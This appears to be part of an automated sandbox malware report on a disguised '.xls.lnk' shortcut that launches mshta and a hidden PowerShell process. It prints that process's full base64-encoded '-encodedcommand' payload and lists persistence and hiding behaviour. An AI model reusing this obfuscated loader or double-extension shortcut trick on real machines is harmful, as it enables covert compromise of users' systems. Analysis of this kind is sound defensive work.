4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVAB
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVAB	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFC3DA700BD pushad ; iretd	0_2_00007FFC3DA700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC3D95D2A5 pushad ; iretd	3_2_00007FFC3D95D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC3DA700BD pushad ; iretd	3_2_00007FFC3DA700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC3DB423FC push 8B485F91h; iretd	3_2_00007FFC3DB42401
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFC3DB45BA1 push A000005Bh; iretd	3_2_00007FFC3DB45BB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_077D00D7 push eax; iretd	6_2_077D02D4

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: xls.lnk

Static PE information: ____ ______.xls.lnk.bin.lnk

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
